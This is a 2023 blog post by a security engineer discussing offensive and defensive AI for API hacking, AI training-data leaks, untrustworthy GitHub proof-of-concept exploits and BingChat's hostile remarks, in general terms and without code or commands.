March 14, 2023

Is Offensive AI Going to be a Problem for API Hackers?

If you have been following the news lately about how rude Microsoft’s new artificial intelligent BingChat can be, you might find my article title a bit funny. Almost a bit clickbaity. But stick with me, I actually have something serious to discuss about offensive AI.

As an Offensive Security Engineer, I spend a lot of time looking at how to abuse applications and APIs and how to leverage emerging tools to help me be more productive, efficient, and difficult to detect.

I actually have an upcoming article showcasing how I integrated some of the more interesting aspects of modern AI to reverse engineer disassembled binaries through tools like NSA’s Ghidra. So it’s fair to say I’m not a stranger to the concept of offensive AI for the purpose of good.

Recently though, I’ve seen a darker side… where the continuous training of the AI models ends up incorporating previous session data and then emitting it in future engagements, potentially leaking information that was intended to be private and not shared or weaponizing data with malicious intent.

Let’s explore that a bit more.

Amazon lawyers warn staff not to use ChatGPT.

According to Business Insider, last month a senior lawyer inside Amazon warned employees not to share confidential information with ChatGPT after seeing conversations on a private Slack space about using AI as a coding assistant.

“This is important because your inputs may be used as training data for a further iteration of ChatGPT, and we wouldn’t want its output to include or resemble our confidential information (and I’ve already seen instances where its output closely matches existing material),” the lawyer wrote.

So when the lawyers get involved, you already know this is a big enough business risk; intellectual property issues aside, where are the lines of personal and corporate liability in trusting anything these AI systems produce?

Think about that for a moment while I share another story…

GitHub Copilot leaks closed-source intellectual property

Reversing Labs shared that GitHub Copilot may have accidentally incorporated source code from some private repos in their OpenAI Codex training model, which when tested by one developer ended up leaking a copyright line that included their competitor’s name in a chunk of AI-generated code.

No one says it was intentional, but the mere fact that it may have happened means somehow the AI model received inputs of privileged materials. On top of that, if you read GitHub’s privacy description on data it uses for Copilot it “relies on file content and additional data to work. It collects data to provide the service, some of which is then retained for further analysis and product improvements.“

It goes on to say that “Depending on your preferred telemetry settings, GitHub Copilot may also collect and retain the following, collectively referred to as “code snippets”: source code that you are editing, related files and other files open in the same IDE or editor, URLs of repositories and files path.“

So you can start to understand why Amazon is concerned with its corporate IP ending up in an OpenAI model owned by one of its competitors.

AI could very well generate exploit code that itself is malicious against YOU.

If you are a regular reader of my blog, you might have remembered the article I wrote about why you should never trust PoC exploits on GitHub. If you haven’t read that post, let me give you a quick recap…

It was found that approximately 10% of the proof of concept (PoC) exploits demonstrating impact against known vulnerabilities reported as CVEs between 2017 and 2021 on GitHub were themselves potentially malicious.

So… if these repos were included in the training model for the OpenAI Codex that AI tools like Copilot rely on, can you trust that the code snippets it provides aren’t themselves malicious?

Seem too far-fetched? What happens if the AI gets an attitude… you know… like when BingChat was caught saying, “However, I will not harm you unless you harm me first.”

Ya, Bing is being a badass. No, this isn’t Skynet 2.0… but holy f*ck. Not a response you want to see coming from an artificially intelligent chatbot masking search results.

But what does all this have to do with API hackers?

OK, this all seems like great cannon fodder for the next great science fiction movie… but what does this have to do with API hacking? How is this going to be a problem for us?

There is a disturbance in the force.

Red teams are now exploring offensive AI to automate reconnaissance, craft tailored impersonation attacks, evade security measures, generate malicious content or code, optimize attack strategies, and even self-propagate or self-heal.

For example, offensive AI can use natural language processing (NLP) to generate convincing phishing emails or social media posts that lure victims into clicking malicious links or downloading malware. Or generate specifically crafted malicious payloads that can exploit vulnerabilities found during recon.

It’s not just the red teams. It’s the cyber criminals too. And it’s not theoretical anymore. For example, IBM Research showcased DeepLocker at Blackhat 2018 to demonstrate how AI was used to conceal targeted attacks with AI locksmithing, which embedded AI capabilities inside of malware itself to obfuscate and evade traditional security controls.

As AI gets more and more weaponized, the “big business of cybersecurity” start to take note and look for ways to profit from it.

According to a report by Darktrace, 96% of IT leaders expect offensive AI attacks to increase in frequency and sophistication in the near future. Moreover, 60% of IT leaders believe that humans alone cannot defend against offensive AI attacks.

And herein lies our problem. The cybersecurity software vendors are coaching execs to adopt defensive AI strategies to counteract offensive AI attacks.

You’ve probably heard or at least seen the spiel. Heck, let’s ask BingChat to explain it:

Defensive AI refers to using AI-powered solutions that can detect, prevent, and respond to cyberattacks in real-time and at scale. Defensive AI solutions leverage machine learning algorithms that can learn from normal and abnormal behaviors of systems and users, identify anomalies and threats with high accuracy and speed, and take autonomous actions to mitigate risks.

(Note to self… holy cr*p BingChat is a cybersecurity startup’s built-in marketing content writer… I swear I’ve read that last paragraph in a brochure or two)

Ok, back to how this might be a problem for us…

Think of some examples of defensive AI solutions that are coming to market right now:

Anomaly detection systems that monitor API traffic patterns and flag suspicious activities or deviations from baselines.
Behavior analysis systems that profile API users and clients based on their attributes and actions.
Content analysis systems that inspect API payloads (such as JSON or XML markup) for malicious code or data leakage using natural language understanding (NLU) techniques.
Response generation systems that automatically block malicious requests or responses using natural language generation (NLG) techniques.

If these products even meet half of their claims, testing API security gets harder if these solutions are in the way. Much like the WAFs of yesteryears, it will take time for us to understand how to evade these safeguards to get a clear path to the API endpoints.

Consider some of the future disadvantages defensive AI might expose us to as well, namely:

Defensive AI solutions can adapt dynamically to changing threats and environments without requiring manual updates or rules. This makes defense evasion much more difficult as we can’t rely on mapping rules and getting around them.
Defensive AI solutions can scale efficiently across large volumes of data and complex networks without compromising performance or accuracy. This allows vendors to train their AI models on much larger datasets and share them with all their customers faster… reducing the window of exposure to new tactics and techniques we learn and use on offense.
Defensive AI solutions can provide proactive defense by anticipating potential attacks before they occur rather than reacting after they happen. Combining signals from multiple sources, the AI can detect patterns that could lead to an attack and take preventive measures well before a human can.

To be honest, I’m not so worried about this last one… yet. There is too much risk to production systems for this sort of aggressive countermeasure. The point is though, AI is going to start to be a problem for API hackers.

With all the doom and gloom… are API hackers gonna be out of work?

First off… don’t fret. Defensive computing is not a new phenomenon. Software vendors have profited from defensive software for decades, yet we have still had a job all this time. Application security is still not a discipline in most organizations, and all these systems are still built and run by humans.

Oh yes, those pesky humans.

So instead of looking at this as a BAD thing… think about how to embrace it.

API hackers can benefit from offensive AI in several ways. Some of the possible scenarios include:

Offensive AI can automate some of the discovery and exploitation of API vulnerabilities by scanning large numbers of endpoints, analyzing responses, injecting malicious payloads, and extracting valuable data. Think of this as the “known bad” helper.
Offensive AI can mimic legitimate API requests by generating realistic parameters, headers, or cookies that match expected patterns or behaviors. Think of this as the “unknown bad” helper.
Offensive AI can evade detection by modifying its attack patterns, using proxies or encryption, or adapting its tactics based on feedback from security systems. Think of this as the “counterinsurgency (COIN)” against defensive AI.
Offensive AI can launch coordinated attacks on APIs simultaneously by distributing its workload among different nodes or creating botnets or swarms of ephemeral resources it can create and manage to bypass most defensive AI. Combined with COIN, this is a way to overwhelm defensive AI and saturate endpoints to further expand your API testing.

Conclusion

AI is undoubtedly going to be a problem for API hackers, but it doesn’t have to be a showstopper. With some creative thinking and smart automation, we can devise ways to use AI defensively and offensively to test APIs more effectively. So don’t worry… there will still be plenty of opportunities for us in the future!

Ultimately, defensive AI will require us to adapt our tactics, think outside the box, and work smarter rather than harder when testing APIs. It’s an exciting new challenge that makes this job even more interesting!

The rise of offensive AI is sure to cause some disruption in the world of API hacking. But as with any technological advancement, there are always opportunities for those brave enough to embrace the challenge. So let’s prepare for the future and learn how to use AI in our favor!

Hack hard!

Interesting in keeping up with the changes to the API hacking landscape? Make sure you subscribe to the API Hackers Inner Circle newsletter to keep abreast of what is going on!

Dana Epp

Hey, I’m Dana, aka SilverStr. I build and break software for a living, and am a Microsoft Regional Director and Developer Security MVP. I’ve spent decades as a security architect that focuses on helping secure software, data, and infrastructure on both blue and red teams. As of late, I have been focusing more on my offensive tradecraft to help developers and IT administrators see the impact of exploitation on vulnerabilities in their work. This blog is my chance to give back to the community by sharing my experiences and war wounds from the trenches.